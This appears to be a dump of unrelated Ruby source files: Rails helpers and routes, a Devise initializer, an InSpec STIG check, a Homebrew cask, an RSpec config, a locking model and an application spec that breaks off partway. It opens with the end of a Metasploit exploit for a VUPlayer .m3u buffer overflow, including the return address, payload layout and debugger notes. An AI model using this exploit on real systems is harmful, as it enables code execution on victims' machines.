[ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ],
],
'Privileged' => false,
'DisclosureDate' => 'Aug 18 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
], self.class)
end
def exploit
m3u = rand_text_alpha_upper(2024)
m3u[1012,4] = [target.ret].pack('V')
m3u[1016,12] = "\x90" * 12
m3u[1028,payload.encoded.length] = payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(m3u)
end
end
=begin
0:000> r eip
eip=68423768
0:000> !pattern_offset 2024
[Byakugan] Control of ecx at offset 996.
[Byakugan] Control of ebp at offset 1008.
[Byakugan] Control of eip at offset 1012.
0:000> d esp
0012ef44 39684238 42306942 69423169 33694232 8Bh9Bi0Bi1Bi2Bi3
0012ef54 42346942 69423569 37694236 42386942 Bi4Bi5Bi6Bi7Bi8B
0012ef64 6a423969 316a4230 42326a42 6a42336a i9Bj0Bj1Bj2Bj3Bj
0012ef74 356a4234 42366a42 6a42376a 396a4238 4Bj5Bj6Bj7Bj8Bj9
0012ef84 42306b42 6b42316b 336b4232 42346b42 Bk0Bk1Bk2Bk3Bk4B
0012ef94 6b42356b 376b4236 42386b42 6c42396b k5Bk6Bk7Bk8Bk9Bl
0:000> s -b 0x10100000 0x1010a000 ff e4
1010539f ff e4 49 10 10 20 05 93-19 01 00 00 00 9c 53 10 ..I.. ........S.
0:000> u 0x1010539f L1
BASSWMA!BASSplugin+0xe9a:
1010539f ffe4 jmp esp
=end | 28.791667 | 101 | 0.626628 |
e28e6ceb38b8a7a8fba95f0e2c5eeaf7082fe10d | 595 | # frozen_string_literal: true
module HomesHelper
def user_name
session[:mastodon][:extra][:raw_info][:username]
end
def display_name
session[:mastodon][:extra][:raw_info][:display_name]
end
def avatar
session[:mastodon][:extra][:raw_info][:avatar]
end
def domain
URI.parse(session[:mastodon][:extra][:raw_info][:url]).host
end
def user_created_at
Time.zone.parse(session[:mastodon][:extra][:raw_info][:created_at])
end
def formatted_birthday
l user_created_at, format: :long
end
def range
time_ago_in_words(user_created_at)
end
end
| 18.59375 | 71 | 0.705882 |
334b78de4e23515da81df5b303066781dbae90a6 | 444 | cask :v1 => 'xtorrent' do
version '2.1 (v171)'
sha256 '26ea235dcb827c6e58ab3409bec83396e86704d742d517e527016ecd44672379'
url "http://acquisition.dreamhosters.com/xtorrent/Xtorrent#{version.gsub(' ','')}.dmg"
appcast 'http://xtorrent.s3.amazonaws.com/appcast.xml',
:sha256 => '21d8752a39782479a9f6f2485b0aba0af3f1f12d17ebc938c7526e5ca1a8b355'
homepage 'http://www.xtorrent.com'
license :freemium
app 'Xtorrent.app'
end
| 34.153846 | 88 | 0.75 |
6170ef9f8cc368a4e716a0ddb4725e9df8c21224 | 954 | # frozen_string_literal: true
Rails.application.routes.draw do
get 'password_resets/new'
get 'password_resets/edit'
get 'sessions/new'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
root 'static_pages#home'
get '/home', to: 'static_pages#home'
get '/help', to: 'static_pages#help'
get '/about', to: 'static_pages#about'
get '/contact', to: 'static_pages#contact'
get '/signup', to: 'users#new'
post '/signup', to: 'users#create'
get '/login', to: 'sessions#new'
post '/login', to: 'sessions#create'
delete '/logout', to: 'sessions#destroy'
resources :users do
member do
get :following, :followers
end
end
resources :account_activations, only: [:edit]
resources :password_resets, only: [:new, :create, :edit, :update]
resources :microposts, only: [:create, :destroy]
resources :relationships, only: [:create, :destroy]
end
| 30.774194 | 101 | 0.677149 |
acd5aa5bfb1a0cfeae19c8fa35b21c094b5e6dbb | 233 | module RailsHooks
module Hooks
def self.table_name_prefix
'hooks_'
end
end
end
RailsHooks::Observer::Event.when_triggered do |record, event|
event.hooks.each do |hook|
hook.notify(record, event.id)
end
end
| 16.642857 | 61 | 0.708155 |
d523c054db58e880aa759d67b6bf5503f73a7519 | 1,898 | module Xeroizer
class OAuth2
attr_reader :client, :access_token
attr_accessor :tenant_id
def initialize(client_key, client_secret, options = {})
@client = ::OAuth2::Client.new(client_key, client_secret, options)
end
def authorize_url(options)
@client.auth_code.authorize_url(options)
end
def authorize_from_access(access_token, options = {})
@access_token = ::OAuth2::AccessToken.new(client, access_token, options)
end
def authorize_from_code(code, options = {})
@access_token = @client.auth_code.get_token(code, options)
end
def authorize_from_client_credentials(params = {}, options = {})
@access_token = @client.client_credentials.get_token(params, options)
end
def renew_access_token
@access_token = @access_token.refresh!
end
def get(path, headers = {})
wrap_response(access_token.get(path, headers: wrap_headers(headers)))
end
def post(path, body = "", headers = {})
wrap_response(access_token.post(path, {body: body, headers: wrap_headers(headers)}))
end
def put(path, body = "", headers = {})
wrap_response(access_token.put(path, body: body, headers: wrap_headers(headers)))
end
def delete(path, headers = {})
wrap_response(access_token.delete(path, headers: wrap_headers(headers)))
end
private
def wrap_headers(headers)
if tenant_id
headers.merge("Xero-tenant-id" => tenant_id)
else
headers
end
end
def wrap_response(response)
Response.new(response)
end
class Response
attr_reader :response
def initialize(response)
@response = response
end
def code
response.status
end
def success?
(200..299).to_a.include?(code)
end
def plain_body
response.body
end
end
end
end
| 22.86747 | 90 | 0.649104 |
7a7a5ae072dccc784e66e096762a8d84e2975380 | 12,686 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
config.secret_key = Rails.application.secrets.secret_key_base || ENV['SECRET_KEY_BASE']
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [ :email ]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [ :email ]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [ :email ]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If http headers should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 10. If
# using other encryptors, it sets how many times you want the password re-encrypted.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# encryptor), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 10
# Setup a pepper to generate the encrypted password.
# config.pepper = '1eb859c028ba631c1d160334ae468214fd2d74071608b2a68397351557d85a821765d9bd6af2aec3668f5ba2920863025a48d21ba514a30d3932c77fbbce5897'
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [ :email ]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 8..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
# config.email_regexp = /\A[^@]+@[^@]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# If true, expires auth token on session timeout.
# config.expire_auth_token_on_timeout = false
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [ :email ]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = false
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [ :email ]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# ==> Configuration for :encryptable
# Allow you to use another encryption algorithm besides bcrypt (default). You can use
# :sha1, :sha512 or encryptors from others authentication tools as :clearance_sha1,
# :authlogic_sha512 (then you should set stretches above to 20 for default behavior)
# and :restful_authentication_sha1 (then you should set stretches to 10, and copy
# REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using omniauth, Devise cannot automatically set Omniauth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
end
| 48.792308 | 150 | 0.748542 |
ffd721b18286216b66f7ed60aca2faab84f7b3dc | 274 | module Rbexy
module Nodes
class AbstractElement < AbstractNode
attr_accessor :name, :members, :children
def initialize(name, members, children)
@name = name
@members = members || []
@children = children
end
end
end
end
| 19.571429 | 46 | 0.613139 |
d5376441129c5190c70f900524ddd37f9d12df50 | 3,755 | # encoding: utf-8
disable_slow_controls = attribute(
'disable_slow_controls',
default: false,
description: 'If enabled, this attribute disables this control and other
controls that consistently take a long time to complete.'
)
exempt_home_users = attribute(
'exempt_home_users',
description: 'These are `home dir` exempt interactive accounts',
default: []
)
non_interactive_shells = attribute(
'non_interactive_shells',
description: 'These shells do not allow a user to login',
default: ["/sbin/nologin","/sbin/halt","/sbin/shutdown","/bin/false","/bin/sync", "/bin/true"]
)
control "V-72037" do
title "Local initialization files must not execute world-writable programs."
if disable_slow_controls
desc "This control consistently takes a long to run and has been disabled
using the disable_slow_controls attribute."
else
desc "If user start-up files execute world-writable programs, especially in
unprotected directories, they could be maliciously modified to destroy user
files or otherwise compromise the system at the user level. If the system is
compromised at the user level, it is easier to elevate privileges to eventually
compromise the system at the root and network level."
end
impact 0.5
tag "gtitle": "SRG-OS-000480-GPOS-00227"
tag "gid": "V-72037"
tag "rid": "SV-86661r1_rule"
tag "stig_id": "RHEL-07-020730"
tag "cci": ["CCI-000366"]
tag "documentable": false
tag "nist": ["CM-6 b", "Rev_4"]
tag "check": "Verify that local initialization files do not execute
world-writable programs.
Check the system for world-writable files with the following command:
# find / -perm -002 -type f -exec ls -ld {} \\; | more
For all files listed, check for their presence in the local initialization
files with the following commands:
Note: The example will be for a system that is configured to create users’ home
directories in the \"/home\" directory.
# grep <file> /home/*/.*
If any local initialization files are found to reference world-writable files,
this is a finding."
tag "fix": "Set the mode on files being executed by the local initialization
files with the following command:
# chmod 0755 <file>"
tag "fix_id": "F-78389r1_fix"
if disable_slow_controls
describe "This control consistently takes a long to run and has been disabled
using the disable_slow_controls attribute." do
skip "This control consistently takes a long to run and has been disabled
using the disable_slow_controls attribute. You must enable this control for a
full accredidation for production."
end
else
ignore_shells = non_interactive_shells.join('|')
#Get home directory for users with UID >= 1000 or UID == 0 and support interactive logins.
dotfiles = Set[]
u = users.where{ !shell.match(ignore_shells) && (uid >= 1000 || uid == 0)}.entries
#For each user, build and execute a find command that identifies initialization files
#in a user's home directory.
u.each do |user|
dotfiles = dotfiles + command("find #{user.home} -xdev -maxdepth 2 -name '.*' -type f").stdout.split("\n")
end
ww_files = Set[]
ww_files = command('find / -perm -002 -type f -exec ls {} \;').stdout.lines
#Check each dotfile for existence of each world-writeable file
findings = Set[]
dotfiles.each do |dotfile|
dotfile = dotfile.strip
ww_files.each do |ww_file|
ww_file = ww_file.strip
count = command("grep -c \"#{ww_file}\" \"#{dotfile}\"").stdout.strip.to_i
findings << dotfile if count > 0
end
end
describe "Local initialization files that are found to reference world-writable files" do
subject { findings.to_a }
it { should be_empty }
end
end
end
| 37.178218 | 112 | 0.71265 |
0148fd1c64e20c0e4117a510020dd020b31f39b7 | 4,252 | require 'zabbix_receiver'
# This file was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause this
# file to always be loaded, without a need to explicitly require it in any files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need it.
#
# The `.rspec` file also contains a few flags that are not defaults but that
# users commonly want.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# These two settings work together to allow you to limit a spec run
# to individual examples or groups you care about by tagging them with
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
# get run.
config.filter_run :focus
config.run_all_when_everything_filtered = true
# Limits the available syntax to the non-monkey patched syntax that is recommended.
# For more details, see:
# - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
# - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
config.disable_monkey_patching!
# This setting enables warnings. It's recommended, but in some cases may
# be too noisy due to issues in dependencies.
config.warnings = true
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = 'doc'
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
| 46.217391 | 129 | 0.745061 |
116ab951b58e7ec4b60e006a2f578c0c0d6a4fb0 | 3,621 | class Lock < ActiveRecord::Base
# Get an atomic lock if value matches or is nil. Block until lock was successful if args[:blocking] was set to true
def self.get name, args = {}
poll_time = args[:poll_time] || 10
start_time = Time.now
until (lock = get_lock_for(name, args)) || args[:blocking] != true || (args[:timeout] && (Time.now - start_time) > args[:timeout]) do
sleep poll_time
end
lock
end
# Release an atomic lock if value matches or is nil
def self.release names, args = {}
successful = false
if name
# If names is a single string, transorm it to an array
names = [names.to_s] if names.class == String || names.class == Symbol
self.transaction do
locks = self.where(:name => names).lock(true).all
unless locks.blank?
successful = true
# Check, if the value of every selected lock matches the args[:value] unless no args[:value] was specified
locks.each{ |l| successful = false unless (args[:value].nil? || (args[:value] != nil && args[:value] == l.value)) }
# Now destroy the locks, if it is successful
locks.each{ |l| l.destroy } if successful
end
end
end
successful
end
# Release all locks for a given task. This is only working, if the value was set to "task #{task.id}"
def self.release_for_task task
self.transaction do
locks = self.where(:value => "task #{task.id}").lock(true).all
locks.each{ |l| l.destroy }
end
end
# Return value of a lock. When no lock was found, nil will be returned.
def self.get_value name
lock = self.where(:name => name).first
if lock
lock.value.nil? ? '' : lock.value
else
nil
end
end
# Destroy all locks in one atomic operation
def self.release_all
self.transaction do
self.all.each { |l| l.destroy }
end
end
private
# Get an atomic lock if value matches or is nil
def self.get_lock_for names, args = {}
successful_if_value_matches = args[:successful_if].to_s == 'value_matches'
successful = false
if names
# If names is a single string, transorm it to an array
names = [names.to_s] if names.class == String || names.class == Symbol
self.transaction do
locks = self.where(:name => names).lock(true).all
if locks.blank?
names.each{ |n| self.create :name => n, :value => args[:value] }
successful = true
else
if args[:force]
names.each do |n|
lock = locks.find{ |l| l.name == n }
if lock
lock.update_attribute :value, args[:value]
else
self.create :name => n, :value => args[:value]
end
end
successful = true
elsif successful_if_value_matches && args[:value] != nil
successful = true
created_locks = []
names.each do |n|
lock = locks.find{ |l| l.name == n }
if lock
successful = false if lock.value != args[:value]
else
created_locks << self.create(:name => n, :value => args[:value])
end
end
# Rollback created locks, if the lock acquire was not successful
created_locks.each{ |l| l.destroy } unless successful
end
end
# Wait some seconds inside the transaction for debuging and testing purposes
sleep args[:debug_wait].to_i if args[:debug_wait]
end
end
successful
end
end
| 29.92562 | 137 | 0.582988 |
878e852f2f6024610a61d0c26cc0234da8e5203c | 356 | require 'rubygems'
require 'jquery-fileupload-rails'
require 'paperclip'
require 'bourbon'
require 'ruby_gallery/attachments_controller'
module RubyGallery
class Engine < Rails::Engine
ActionController::Base.send(:extend, RubyGallery::AttachmentsController)
# same as ActionController::Base.extend(RubyGallery::AttachmentsController)
end
end | 29.666667 | 79 | 0.800562 |
1af383bf50b1b010e31226d0252a976d6418599c | 835 | require 'authzed/api/v0/acl_service_pb'
require 'authzed/api/v0/acl_service_services_pb'
require 'authzed/api/v0/core_pb'
require 'authzed/api/v0/developer_pb'
require 'authzed/api/v0/developer_services_pb'
require 'authzed/api/v0/namespace_pb'
require 'authzed/api/v0/namespace_service_pb'
require 'authzed/api/v0/namespace_service_services_pb'
require 'authzed/api/v0/watch_service_pb'
require 'authzed/api/v0/watch_service_services_pb'
require 'authzed/api/v0/client'
require 'authzed/api/v1alpha1/schema_pb'
require 'authzed/api/v1alpha1/schema_services_pb'
require 'authzed/api/v1alpha1/client'
require 'authzed/api/v1/schema_services_pb'
require 'authzed/api/v1/watch_service_services_pb'
require 'authzed/api/v1/permission_service_services_pb'
require 'authzed/api/v1/client'
require 'grpcutil/bearer_token'
module Authzed
end
| 36.304348 | 55 | 0.838323 |
9131ab64dbe062bc7637484f305b0d284eb3a0fe | 14,277 | require 'rails_helper'
RSpec.describe Mentor::Application, type: :model do
describe 'attributes' do
subject { described_class.new }
it { is_expected.to respond_to :id }
it { is_expected.to respond_to :team_name }
it { is_expected.to respond_to :project_name }
it { is_expected.to respond_to :project_id }
it { is_expected.to respond_to :project_plan }
it { is_expected.to respond_to :why_selected_project }
it { is_expected.to respond_to :choice }
it { is_expected.to respond_to :signed_off_by }
it { is_expected.to respond_to :signed_off_at }
it { is_expected.to respond_to :mentor_fav }
end
describe '.all_for(project_is: choice:)' do
let!(:project1) { create(:project, :in_current_season) }
let!(:project2) { create(:project, :in_current_season) }
let!(:other_project) { create(:project, :in_current_season) }
context 'when first choice project' do
subject { described_class.all_for(projects: projects, choice: 1) }
context 'when passing an empty projects collection' do
let(:projects) { Project.where(id: -99) }
it 'returns an empty array' do
create(:application, :in_current_season, :for_project, project1: project1)
expect(subject).to eq []
end
end
context 'when passing only project1' do
let(:projects) { Project.where(id: project1.id) }
it 'returns applications of the season which chose the project as first choice' do
first_choice = create_list(:application, 3, :in_current_season, :for_project, project1: project1)
second_choice = create(:application, :in_current_season, :for_project, project1: project2, project2: project1)
other = create(:application, :in_current_season, :for_project, project1: project2)
ids = subject.map(&:id)
expect(ids).to match_array first_choice.map(&:id)
expect(ids).not_to include second_choice
expect(ids).not_to include other
end
end
context 'when passing multiple projects' do
let(:projects) { Project.where(id: [project1.id, project2.id]) }
it 'returns applications of the season which chose one of the projects as first choice' do
first_choice1 = create(:application, :in_current_season, :for_project, project1: project1)
first_choice2 = create(:application, :in_current_season, :for_project, project1: project2)
second_choice1 = create(:application, :in_current_season, :for_project, project1: build(:project), project2: project2)
ids = subject.map(&:id)
expect(ids).to contain_exactly(first_choice1.id, first_choice2.id)
end
end
context 'when passing a project from the wrong season' do
let(:projects) { Project.where(id: project1.id) }
it "returns an empty array" do
last_season = Season.create name: Date.today.year - 1
create(:application, :for_project, project1: project1, season: last_season)
expect(subject).to eq []
end
end
end
context 'when second choice project' do
subject { described_class.all_for(projects: projects, choice: 2) }
context 'when passing an empty projects collection' do
let(:projects) { Project.where(id: -99) }
it 'returns an empty array' do
create(:application, :in_current_season, :for_project, project1: project1)
expect(subject).to eq []
end
end
context 'when passing a single project' do
let(:projects) { Project.where(id: project1.id) }
it 'returns applications of the season which chose the project as first choice' do
create(:application, :in_current_season, :for_project, project1: project1)
second_choice = create(:application, :in_current_season, :for_project, project1: project2, project2: project1)
expect(subject.map(&:id)).to contain_exactly second_choice.id
end
end
end
end
describe '.find(id:, projects:, season: Season.current)' do
let!(:project1) { create(:project, :in_current_season) }
let!(:project2) { create(:project, :in_current_season) }
let!(:other_project) { create(:project) }
let(:projects) { Project.where(id: [project1.id, project2.id]) }
shared_examples :found_an_application do |choice|
it 'returns the application mapped as Mentor::Application with Mentor::Students' do
expect(subject).to be_a(Mentor::Application)
expect(subject.student0).to be_a(Mentor::Student)
expect(subject.student1).to be_a(Mentor::Student)
end
it 'contains all relevant attributes' do
expect(subject).to have_attributes(
id: application.id,
project_id: project1.id,
team_name: application.team.name,
project_name: project1.name,
project_plan: application.data.send("plan_project#{choice}"),
why_selected_project: application.data.send("why_selected_project#{choice}"),
choice: choice
)
end
it 'contains all relevant data for student0' do
expect(subject.student0).to have_attributes(
coding_level: application.data.student0_application_coding_level.to_i,
code_samples: application.data.student0_application_code_samples,
learning_history: application.data.student0_application_learning_history,
language_learning_period: application.data.student0_application_language_learning_period,
skills: application.data.student0_application_skills
)
end
it 'contains all relevant data for student1' do
expect(subject.student1).to have_attributes(
coding_level: application.data.student1_application_coding_level.to_i,
code_samples: application.data.student1_application_code_samples,
learning_history: application.data.student1_application_learning_history,
language_learning_period: application.data.student1_application_language_learning_period,
skills: application.data.student1_application_skills
)
end
end
subject { described_class.find(id: application.id, projects: projects) }
context 'when application exists as first choice' do
let!(:application) { create(:application, :in_current_season, :for_project, project1: project1) }
it_behaves_like :found_an_application, 1
end
context 'when application exists as second choice' do
let!(:application) do
create(:application, :in_current_season, :for_project, project1: other_project, project2: project1)
end
it_behaves_like :found_an_application, 2
end
context 'when wrong project' do
let(:projects) { Project.where(id: other_project.id) }
let!(:application) { create(:application, :in_current_season, :for_project, project1: project1) }
it 'raises a NotFound error' do
expect { subject }.to raise_error(ActiveRecord::RecordNotFound)
end
end
context 'when application does not exist' do
let(:application) { double(id: 1) }
it 'raises a NotFound error' do
expect { subject }.to raise_error(ActiveRecord::RecordNotFound)
end
end
end
describe '#find_or_initialize_comment_by(mentor)' do
let(:mentor_application) { described_class.new(id: 1) }
let(:mentor) { create(:mentor) }
subject { mentor_application.find_or_initialize_comment_by(mentor) }
it 'returns the persisted comment when one exists' do
comment = Mentor::Comment.create(commentable_id: mentor_application.id, user: mentor)
expect(subject).to eq comment
end
it 'has the Mentor::Application as commentable type' do
expect(subject).to have_attributes(
commentable_id: mentor_application.id,
commentable_type: described_class.name,
user: mentor
)
end
it 'returns a new comment if none is persisted yet' do
expect(subject).to be_a_new(Mentor::Comment)
end
it 'returns a new comment if a comment for the application is persisted' do
create(:comment, commentable_id: mentor_application.id, commentable_type: 'Application', user: mentor)
expect(subject).to be_a_new(Mentor::Comment)
end
end
describe '#mentor_fav!' do
let(:application) { create(:application) }
subject { m_application.mentor_fav! }
shared_examples :a_mentor_fav do |choice|
let(:other) { (choice % 2) + 1 }
it 'adds a fav for the chosen project to the persisted application record' do
expect { subject }
.to change { application.reload.data.send("mentor_fav_project#{choice}") }
.from(nil).to('true')
end
it 'does not change the mentor_fav for the other project' do
expect { subject }
.not_to change { application.reload.data.send("mentor_fav_project#{other}") }
end
end
context 'when project 1st choice' do
let(:m_application) { described_class.new(id: application.id, choice: 1) }
include_examples :a_mentor_fav, 1
end
context 'when project 2nd choice' do
let(:m_application) { described_class.new(id: application.id, choice: 2) }
include_examples :a_mentor_fav, 2
end
end
describe '#revoke_mentor_fav!' do
let(:application) do
create(:application,
application_data: {
'mentor_fav_project1': 'true',
'mentor_fav_project2': 'true'
}
)
end
subject { m_application.revoke_mentor_fav! }
shared_examples :a_mentor_fav do |choice|
let(:other) { (choice % 2) + 1 }
it 'removes the fav for the chosen project' do
expect { subject }
.to change { application.reload.application_data["mentor_fav_project#{choice}"] }
.from('true').to(nil)
end
it 'does not change the mentor_fav for the other project' do
expect { subject }
.not_to change { application.reload.data.send("mentor_fav_project#{other}") }
end
end
context 'when project 1st choice' do
let(:m_application) { described_class.new(id: application.id, choice: 1) }
include_examples :a_mentor_fav, 1
end
context 'when project 2nd choice' do
